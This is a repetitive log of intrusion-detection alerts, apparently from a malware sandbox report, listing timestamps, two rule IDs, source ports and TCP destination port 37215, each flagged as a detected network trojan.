                Timestamp:06/14/24-10:43:39.808955
                SID:2829579
                Source Port:34972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985429
                SID:2829579
                Source Port:54710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366374
                SID:2829579
                Source Port:40564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881708
                SID:2829579
                Source Port:41418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848887
                SID:2829579
                Source Port:39048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675803
                SID:2829579
                Source Port:55450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228927
                SID:2829579
                Source Port:37976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071429
                SID:2835222
                Source Port:38636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.976929
                SID:2835222
                Source Port:46958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027195
                SID:2829579
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383172
                SID:2829579
                Source Port:48738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152305
                SID:2829579
                Source Port:34882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859053
                SID:2829579
                Source Port:41700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275927
                SID:2829579
                Source Port:52936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179619
                SID:2835222
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546860
                SID:2835222
                Source Port:54500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407445
                SID:2829579
                Source Port:34586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326155
                SID:2835222
                Source Port:36386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704390
                SID:2835222
                Source Port:58388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670346
                SID:2835222
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224581
                SID:2835222
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545832
                SID:2835222
                Source Port:38128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732683
                SID:2835222
                Source Port:42428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185132
                SID:2829579
                Source Port:58114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.090969
                SID:2829579
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029991
                SID:2829579
                Source Port:33058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031459
                SID:2829579
                Source Port:38586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367606
                SID:2835222
                Source Port:54988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274686
                SID:2829579
                Source Port:52770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014591
                SID:2829579
                Source Port:60632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616498
                SID:2835222
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676617
                SID:2835222
                Source Port:50570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501763
                SID:2829579
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164430
                SID:2835222
                Source Port:56776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861871
                SID:2835222
                Source Port:33948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111666
                SID:2829579
                Source Port:49488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022788
                SID:2829579
                Source Port:37664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917062
                SID:2829579
                Source Port:39844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113773
                SID:2829579
                Source Port:58236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163825
                SID:2829579
                Source Port:39372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997975
                SID:2829579
                Source Port:33704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763137
                SID:2835222
                Source Port:46106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017387
                SID:2829579
                Source Port:41212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292491
                SID:2835222
                Source Port:36000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944441
                SID:2835222
                Source Port:42594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718352
                SID:2835222
                Source Port:60506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882895
                SID:2835222
                Source Port:58718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056548
                SID:2829579
                Source Port:42526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762246
                SID:2835222
                Source Port:43010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965465
                SID:2835222
                Source Port:59580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776694
                SID:2835222
                Source Port:48626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134193
                SID:2829579
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766607
                SID:2835222
                Source Port:40360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421287
                SID:2835222
                Source Port:58604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381474
                SID:2829579
                Source Port:57324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829980
                SID:2829579
                Source Port:55506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967457
                SID:2835222
                Source Port:45078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183893
                SID:2829579
                Source Port:53694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202028
                SID:2835222
                Source Port:58556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616309
                SID:2829579
                Source Port:40326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011618
                SID:2835222
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411640
                SID:2835222
                Source Port:53970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917209
                SID:2835222
                Source Port:53250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132953
                SID:2829579
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805063
                SID:2835222
                Source Port:38556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152579
                SID:2829579
                Source Port:41466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410428
                SID:2835222
                Source Port:59120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134998
                SID:2835222
                Source Port:47040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849282
                SID:2835222
                Source Port:54666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229586
                SID:2829579
                Source Port:51768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422072
                SID:2829579
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517283
                SID:2829579
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546053
                SID:2835222
                Source Port:37612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451113
                SID:2835222
                Source Port:49864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567133
                SID:2835222
                Source Port:57054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676891
                SID:2835222
                Source Port:35016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859945
                SID:2835222
                Source Port:39602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472522
                SID:2835222
                Source Port:34020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897178
                SID:2829579
                Source Port:48434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915559
                SID:2829579
                Source Port:35668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001134
                SID:2835222
                Source Port:38524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679704
                SID:2829579
                Source Port:39044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074230
                SID:2835222
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806271
                SID:2829579
                Source Port:35152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143443
                SID:2835222
                Source Port:47392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883085
                SID:2835222
                Source Port:42852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000494
                SID:2829579
                Source Port:41330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344263
                SID:2829579
                Source Port:59288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807758
                SID:2829579
                Source Port:55108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088990
                SID:2835222
                Source Port:53732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997403
                SID:2829579
                Source Port:54478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273706
                SID:2829579
                Source Port:47484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226473
                SID:2829579
                Source Port:57678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777754
                SID:2829579
                Source Port:40006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089916
                SID:2829579
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148758
                SID:2829579
                Source Port:59358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913217
                SID:2829579
                Source Port:56564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914143
                SID:2829579
                Source Port:41930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111996
                SID:2835222
                Source Port:39260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112251
                SID:2829579
                Source Port:58134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518363
                SID:2835222
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917125
                SID:2829579
                Source Port:56816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762865
                SID:2835222
                Source Port:44292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199734
                SID:2829579
                Source Port:58918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849764
                SID:2829579
                Source Port:32964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827476
                SID:2829579
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615991
                SID:2835222
                Source Port:53828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934481
                SID:2829579
                Source Port:38100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030179
                SID:2835222
                Source Port:45514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132992
                SID:2835222
                Source Port:42230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966675
                SID:2835222
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.613964
                SID:2835222
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.387264
                SID:2829579
                Source Port:50206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737826
                SID:2829579
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504537
                SID:2835222
                Source Port:47998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472779
                SID:2829579
                Source Port:43758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672917
                SID:2829579
                Source Port:42022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146685
                SID:2835222
                Source Port:60742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028320
                SID:2829579
                Source Port:49602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368441
                SID:2835222
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568180
                SID:2829579
                Source Port:42962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246207
                SID:2835222
                Source Port:50998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074628
                SID:2835222
                Source Port:50082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849607
                SID:2829579
                Source Port:48124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700803
                SID:2829579
                Source Port:50806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906203
                SID:2835222
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792307
                SID:2835222
                Source Port:56810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699691
                SID:2835222
                Source Port:33040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054514
                SID:2829579
                Source Port:41450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881299
                SID:2835222
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244902
                SID:2835222
                Source Port:35820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227671
                SID:2835222
                Source Port:56806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763193
                SID:2835222
                Source Port:39418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367859
                SID:2829579
                Source Port:55504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968681
                SID:2835222
                Source Port:60654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421692
                SID:2835222
                Source Port:54250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915667
                SID:2835222
                Source Port:53390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678513
                SID:2829579
                Source Port:54260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897141
                SID:2829579
                Source Port:49618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792818
                SID:2829579
                Source Port:58858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849456
                SID:2829579
                Source Port:60370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547702
                SID:2829579
                Source Port:45732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420690
                SID:2835222
                Source Port:55004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452780
                SID:2829579
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944413
                SID:2829579
                Source Port:57928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242407
                SID:2835222
                Source Port:49646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469682
                SID:2835222
                Source Port:53770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941883
                SID:2829579
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581581
                SID:2835222
                Source Port:40518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986209
                SID:2835222
                Source Port:46702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907254
                SID:2835222
                Source Port:39978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916665
                SID:2835222
                Source Port:47904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018729
                SID:2835222
                Source Port:58296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519173
                SID:2835222
                Source Port:58398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805425
                SID:2835222
                Source Port:37712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150295
                SID:2829579
                Source Port:44202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518638
                SID:2829579
                Source Port:45082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827923
                SID:2835222
                Source Port:37098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968956
                SID:2829579
                Source Port:52464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790472
                SID:2835222
                Source Port:50256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022414
                SID:2835222
                Source Port:52502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850403
                SID:2829579
                Source Port:44226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198582
                SID:2835222
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367176
                SID:2829579
                Source Port:54090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967114
                SID:2829579
                Source Port:57880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718780
                SID:2835222
                Source Port:52194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984617
                SID:2829579
                Source Port:42196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451648
                SID:2829579
                Source Port:40500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682982
                SID:2829579
                Source Port:44120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198241
                SID:2835222
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520257
                SID:2829579
                Source Port:50790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984392
                SID:2835222
                Source Port:50942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898449
                SID:2835222
                Source Port:57878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777669
                SID:2829579
                Source Port:52490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792931
                SID:2835222
                Source Port:54604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645783
                SID:2829579
                Source Port:54490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967767
                SID:2835222
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034375
                SID:2829579
                Source Port:48132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024386
                SID:2829579
                Source Port:55530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180948
                SID:2829579
                Source Port:53652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246061
                SID:2835222
                Source Port:51360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733099
                SID:2829579
                Source Port:50012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933359
                SID:2829579
                Source Port:36988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253182
                SID:2835222
                Source Port:55290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812067
                SID:2829579
                Source Port:52442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549294
                SID:2829579
                Source Port:55500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715432
                SID:2835222
                Source Port:42094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290162
                SID:2835222
                Source Port:50836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517537
                SID:2829579
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735594
                SID:2835222
                Source Port:42528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022299
                SID:2835222
                Source Port:40926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.582210
                SID:2835222
                Source Port:47770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727895
                SID:2835222
                Source Port:51248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075270
                SID:2835222
                Source Port:48526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669129
                SID:2835222
                Source Port:39542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763789
                SID:2829579
                Source Port:46354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846984
                SID:2835222
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017636
